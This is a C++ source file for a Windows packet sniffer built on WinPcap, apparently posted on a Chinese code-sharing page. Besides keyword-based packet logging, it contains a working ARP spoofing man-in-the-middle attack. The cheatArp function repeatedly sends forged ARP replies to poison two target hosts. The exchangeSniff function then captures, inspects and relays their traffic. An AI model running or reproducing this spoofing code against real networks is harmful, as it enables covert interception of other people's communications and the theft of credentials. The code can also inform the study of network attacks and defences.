📄 f_winsniffdlg.cpp
字号:
int index = m_dataList.InsertItem(0,"TCP");
//记录源IP以及源端口到第1列
cs.Format("%s:%d",source_ip,ntohs(lpTcphdr->m_sport));
m_dataList.SetItem(index,1,LVIF_TEXT,cs,0,0,0,0);
//记录目的IP以及目的端口到第2列
cs.Format("%s:%d",dest_ip,ntohs(lpTcphdr->m_dport));
m_dataList.SetItem(index,2,LVIF_TEXT,cs,0,0,0,0);
//记录该记录产生的时间到第3列
//cs.Format("%d:%d",cHour,cMin);
cs=t.Format("%Y-%m-%d %H-%M-%S");
m_dataList.SetItem(index,3,LVIF_TEXT,cs,0,0,0,0);
//记录数据包大小到第4列
cs.Format("%d",(int)lpPacket->ulBytesReceived);
m_dataList.SetItem(index,4,LVIF_TEXT,cs,0,0,0,0);
//记录包含的关键字的序号到第5列
cs.Format("%d",rule_num);
m_dataList.SetItem(index,5,LVIF_TEXT,cs,0,0,0,0);
}
}
else if(lpIphdr->m_protocol==IPPROTO_UDP)//UDP包处理
{
//获取UDP包头信息,偏移地址为buf + lpBpfhdr的长度 + ET_HEADER的长度 + IP_HEADER的长度
UDP_HEADER *lpUdphdr=(UDP_HEADER *)(buf+lpBpfhdr->bh_hdrlen+ET_HEADER_size+IP_HEADER_size);
rule_num=checkkey(buf,(int)lpPacket->ulBytesReceived)+1;
if(rule_num>0)
{
//记录协议类型到第0列
int index = m_dataList.InsertItem(0,"UDP");
//记录源IP以及源端口到第1列
cs.Format("%s:%d",source_ip,ntohs(lpUdphdr->m_sport));
m_dataList.SetItem(index,1,LVIF_TEXT,cs,0,0,0,0);
//记录目的IP以及目的端口到第2列
cs.Format("%s:%d",dest_ip,ntohs(lpUdphdr->m_dport));
m_dataList.SetItem(index,2,LVIF_TEXT,cs,0,0,0,0);
//记录该记录产生的时间到第3列
//cs.Format("%d:%d",cHour,cMin);
cs=t.Format("%Y-%m-%d %H-%M-%S");
m_dataList.SetItem(index,3,LVIF_TEXT,cs,0,0,0,0);
//记录数据包大小到第4列
cs.Format("%d",(int)lpPacket->ulBytesReceived);
m_dataList.SetItem(index,4,LVIF_TEXT,cs,0,0,0,0);
//记录包含的关键字的序号到第5列
cs.Format("%d",rule_num);
m_dataList.SetItem(index,5,LVIF_TEXT,cs,0,0,0,0);
}
}
}
}
void CF_WinSniffDlg::OnChangeModal()
{
// TODO: Add your control notification handler code here
if(m_modal.GetCurSel()==1)
{
this->GetDlgItem(IDC_CHECKALL)->EnableWindow(TRUE);
this->GetDlgItem(IDC_CHECKPTOP)->EnableWindow(TRUE);
m_isNormal=TRUE;
}
else if(m_modal.GetCurSel()==0)
{
this->CheckRadioButton(IDC_CHECKALL,IDC_CHECKPTOP,IDC_CHECKPTOP);
OnCheckPtop();
this->GetDlgItem(IDC_CHECKALL)->EnableWindow(FALSE);
this->GetDlgItem(IDC_CHECKPTOP)->EnableWindow(FALSE);
m_isNormal=FALSE;
}
}
void CF_WinSniffDlg::getAdapter()
{
int i;
for(i=0;i<m_localAdapterNum;i++)
{
CString cs;
cs.Format("Adapter %d",i+1);
m_adapter.AddString(cs);
}
m_adapter.SetCurSel(0);
return;
}
void CF_WinSniffDlg::OnChangeAdapter()
{
// TODO: Add your control notification handler code here
m_indexOfAdapter=m_adapter.GetCurSel();
}
DWORD WINAPI cheatArp(void *param)
{
CHEATARP_INFO info={0};
memcpy(&info,param,sizeof(CHEATARP_INFO));
ET_HEADER et_header={0};
ARP_HEADER arp_header={0};
char buffer[512]={0};
//伪造ARP应答包:
memcpy(et_header.eh_src,info.localMac,6);
memcpy(et_header.eh_dst,info.targetMac,6);
et_header.eh_type=htons(0x0806); //类型为0x0806表示这是ARP包
arp_header.arp_hdr=htons(0x0001); //硬件地址类型以太网地址
arp_header.arp_pro=htons(0x0800); //协议地址类型为IP协议
arp_header.arp_hln=6; //硬件地址长度为6
arp_header.arp_pln=4; //协议地址长度为4
arp_header.arp_opt=htons(0x0002); //标识为ARP应答
arp_header.arp_spa=inet_addr(info.simulateIP); //source_ip
memcpy(arp_header.arp_sha,et_header.eh_src,6);
arp_header.arp_tpa=inet_addr(info.targetIP); //target_ip
memcpy(arp_header.arp_tha,et_header.eh_dst,6);
memcpy(buffer,&et_header,sizeof(ET_HEADER));
memcpy(buffer+sizeof(ET_HEADER),&arp_header,sizeof(ARP_HEADER));
//发送伪造地ARP应答包:
LPPACKET lpPacket;
lpPacket=PacketAllocatePacket(); //给PACKET结构指针分配内存
PacketInitPacket(lpPacket,buffer,sizeof(buffer)); //初始化PACKET结构指针
if(PacketSetNumWrites(lpAdapter,1)==FALSE) //设置发送次数
{
MessageBox(0,"warning: Unable to send more than one packet in a single write!","",0);
}
while(isRun==TRUE)
{
PacketSendPacket(lpAdapter,lpPacket,TRUE); //不断发送伪造的ARP应答包达到欺骗目标主机的目的
Sleep(3000);
}
PacketFreePacket(lpPacket); //释放lpPacket
return 0;
}
void StrToMac(char *str,char *mac) //自定义的将字符串转换成mac地址的函数
{
char *str1;
int i;
int low,high;
char temp;
for(i=0;i<6;i++)
{
str1=str+1;
switch(*str)
{
case 'a':high=10;
break;
case 'b':high=11;
break;
case 'c':high=12;
break;
case 'd':high=13;
break;
case 'e':high=14;
break;
case 'f':high=15;
break;
default:temp=*str;
high=atoi(&temp);
}
switch(*str1)
{
case 'a':low=10;
break;
case 'b':low=11;
break;
case 'c':low=12;
break;
case 'd':low=13;
break;
case 'e':low=14;
break;
case 'f':low=15;
break;
default:temp=*str1;
low=atoi(&temp);
}
mac[i]=high*16+low;
str+=2;
}
}
//00e04c01336e
void getLocalMac(char *localMac,char *localIP) //获取本机MAC地址
{
ULONG sizeOfAdapterInfo=0;
char mac[5][20]={0},IP[5][20]={0};
GetAdaptersInfo(NULL,&sizeOfAdapterInfo); //取得网卡信息
if(sizeOfAdapterInfo!=0)
{
IP_ADAPTER_INFO *pAdapterInfo=(IP_ADAPTER_INFO *)malloc(sizeOfAdapterInfo);
memset(pAdapterInfo,0,sizeOfAdapterInfo);
GetAdaptersInfo(pAdapterInfo,&sizeOfAdapterInfo);
for(int i=0;( (i<5) && (pAdapterInfo!=NULL) );i++)
{
sprintf(mac[i],"%02x%02x%02x%02x%02x%02x",pAdapterInfo->Address[0],pAdapterInfo->Address[1],pAdapterInfo->Address[2],
pAdapterInfo->Address[3],pAdapterInfo->Address[4],pAdapterInfo->Address[5]);
memcpy( IP[i],pAdapterInfo->IpAddressList.IpAddress.String,strlen(pAdapterInfo->IpAddressList.IpAddress.String) );
pAdapterInfo=pAdapterInfo->Next;
}
}
memcpy(localMac,mac[pthis->m_indexOfAdapter],strlen(mac[pthis->m_indexOfAdapter]));
memcpy(localIP,IP[pthis->m_indexOfAdapter],strlen(IP[pthis->m_indexOfAdapter]));
return;
}
bool getRemoteMac(char *remoteMac,char *remoteIP) //获取远程主机MAC地址
{
WSADATA wsaData;
ULONG remoteAddr=0,macAddrLen=6;
char remoteMacTemp[6]={0};
if(WSAStartup(MAKEWORD(2,1), &wsaData)!=0)
{
MessageBox(0,"WSAStartup error!","",0);
return FALSE;
}
remoteAddr=inet_addr(remoteIP);
if(SendARP(remoteAddr, (unsigned long)NULL,(PULONG)&remoteMacTemp, &macAddrLen)!=NO_ERROR)
{
MessageBox(0,"Get remote MAC failed!","",0);
return FALSE;
}
memcpy(remoteMac,remoteMacTemp,6);
return TRUE;
}
DWORD WINAPI exchangeSniff(void *no)
{
static CHAR adapter_list[10][1024];
WCHAR adapter_name[2048];
WCHAR *name1,*name2;
ULONG adapter_length=4096;
ULONG i,adapter_num=0;
//取得所有适配器的名字.
if(PacketGetAdapterNames((char*)adapter_name, &adapter_length)==FALSE)
{
//adapter_name:一块用户负责分配的缓冲区,将把适配器的名字填充进去,
//一串用一个Unicode的"\0"分隔的Unicode字符串,每一个都是一个网卡的名字
//adapter_length:这块缓冲区的大小
MessageBox(0,"PacketGetAdapterNames error!","",0);
return 1;
}
name1=adapter_name;
name2=adapter_name;
i = 0;
//把AdapterName中的适配器,分个copy到adapter_list[]中,i从0开始为第一个
while((*name1!='\0') || (*(name1-1)!='\0'))
{
if(*name1=='\0')
{
memcpy(adapter_list[i],name2,2*(name1-name2));
name2=name1+1;
i++;
}
name1++;
}
//打开选择的那个适配器,AdapterList[m_indexOfAdapter]为适配器名字
//如果打开成功,返回一个指针,它指向一个正确初始化了的ADAPTER Object。否则,返回NULL。
lpAdapter=(LPADAPTER)PacketOpenAdapter((LPTSTR)adapter_list[pthis->m_indexOfAdapter]);
if (!lpAdapter||(lpAdapter->hFile==INVALID_HANDLE_VALUE))
{
MessageBox(0,"Unable to open the driver!","",0);
return 1;
}
//设置网卡为直接模式
if(PacketSetHwFilter(lpAdapter,NDIS_PACKET_TYPE_DIRECTED)==FALSE)
{
MessageBox(0,"Warning: Unable to set the adapter to directed mode!","",0);
}
//设置捕获数据报的内核级缓冲区大小
if(PacketSetBuff(lpAdapter,8*1024)==FALSE)
{
MessageBox(0,"PacketSetBuff Error!","",0);
return -1;
}
// MessageBox(0,"Exchange sniff!","",0);
DWORD Addr=0;
char *IP=NULL,IP1[20]={0},IP2[20]={0};
if( ( pthis->m_ip1.IsBlank() ) || ( pthis->m_ip2.IsBlank() ) )
{
MessageBox(0,"Please fill in the IP!","",0);
return -1;
}
pthis->m_ip1.GetAddress(Addr);
Addr = htonl(Addr);
IP = inet_ntoa(*(in_addr*)&Addr);
memcpy(IP1,IP,strlen(IP));
Addr=0;
pthis->m_ip2.GetAddress(Addr);
Addr = htonl(Addr);
IP = inet_ntoa(*(in_addr*)&Addr);
memcpy(IP2,IP,strlen(IP));
char localStrMac[20]={0},localIP[20]={0},localMac[6]={0};
getLocalMac(localStrMac,localIP);
StrToMac(localStrMac,localMac);
char remoteMac1[6]={0},remoteMac2[6]={0};
if(getRemoteMac(remoteMac1,IP1)==FALSE)
{
return -1;
}
if(getRemoteMac(remoteMac2,IP2)==FALSE)
{
return -1;
}
CHEATARP_INFO param1={0},param2={0};
memcpy(param1.targetIP,IP1,strlen(IP1));
memcpy(param1.targetMac,remoteMac1,6);
memcpy(param1.simulateIP,IP2,strlen(IP2));
memcpy(param1.localMac,localMac,6);
memcpy(param2.targetIP,IP2,strlen(IP2));
memcpy(param2.targetMac,remoteMac2,6);
memcpy(param2.simulateIP,IP1,strlen(IP1));
memcpy(param2.localMac,localMac,6);
DWORD ID1=0,ID2=0;
CreateThread(NULL,0,cheatArp,¶m1,0,&ID1);
CreateThread(NULL,0,cheatArp,¶m2,0,&ID2);
PacketSetBuff(lpAdapter,2048); //设置网卡接收数据包的缓冲区大小
PacketSetReadTimeout(lpAdapter,2); //设置接收到一个包后的“休息”时间
char buf[1024]={0};
LPPACKET lpPacket;
while(isRun==TRUE)
{
lpPacket=PacketAllocatePacket(); //给PACKET结构指针分配内存
PacketInitPacket(lpPacket,buf,sizeof(buf)); //初始化PACKET结构指针
PacketReceivePacket(lpAdapter, lpPacket, TRUE); //接收数据包
char *pBuf;
ET_HEADER *lpEthdr;
bpf_hdr *lpBpfhdr;
bool isAssay=FALSE;
DWORD sIP=0,dIP=0;
char source_ip[20]={0},dest_ip[20]={0};
in_addr addr={0};
pBuf=(char *)lpPacket->Buffer;
lpBpfhdr=(bpf_hdr *)pBuf;
lpEthdr=(ET_HEADER *)(pBuf+lpBpfhdr->bh_hdrlen);
if(lpEthdr->eh_type==htons(0x0800)) //帧类型为0x0800则表示为IP包
{
IP_HEADER *lpIphdr=(IP_HEADER *)(buf+lpBpfhdr->bh_hdrlen+sizeof(ET_HEADER));
sIP=lpIphdr->m_sIP;
dIP=lpIphdr->m_dIP;
addr.S_un.S_addr=sIP;
memcpy(source_ip,inet_ntoa(addr),strlen(inet_ntoa(addr)));
memset(&addr,0,sizeof(in_addr));
addr.S_un.S_addr=dIP;
memcpy(dest_ip,inet_ntoa(addr),strlen(inet_ntoa(addr)));
if( ( strcmp(source_ip,IP1) == 0 ) && ( strcmp(dest_ip,IP2) == 0 ) )
{
isAssay=TRUE;
}
else if( ( strcmp(source_ip,IP2) == 0 ) && ( strcmp(dest_ip,IP1) == 0 ) )
{
isAssay=TRUE;
}
if(isAssay==TRUE)
{
pthis->assay(lpPacket); //分析数据包
//以下是将嗅探到的包发送到真正的目的地:
LPPACKET lpSendPacket=NULL;
char sendBuf[1024]={0};
if(strcmp(dest_ip,IP1)==0)
{
memcpy(lpEthdr->eh_dst,remoteMac1,6);
}
else if(strcmp(dest_ip,IP2)==0)
{
memcpy(lpEthdr->eh_dst,remoteMac2,6);
}
memcpy(sendBuf,lpEthdr,sizeof(ET_HEADER));
memcpy(sendBuf+sizeof(ET_HEADER),lpIphdr,ntohs(lpIphdr->m_tlen));
lpSendPacket=PacketAllocatePacket();
PacketInitPacket(lpSendPacket,sendBuf,sizeof(sendBuf));
PacketSetNumWrites(lpAdapter,1);
PacketSendPacket(lpAdapter,lpSendPacket,TRUE); //发送数据包不能太大
PacketFreePacket(lpSendPacket); //释放PACKET结构指针
}
}
//每次收包后重置lpPacket:
PacketFreePacket(lpPacket);
memset(buf,0,sizeof(buf));
}
PacketFreePacket(lpPacket); //释放lpPacket
return 0;
}
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -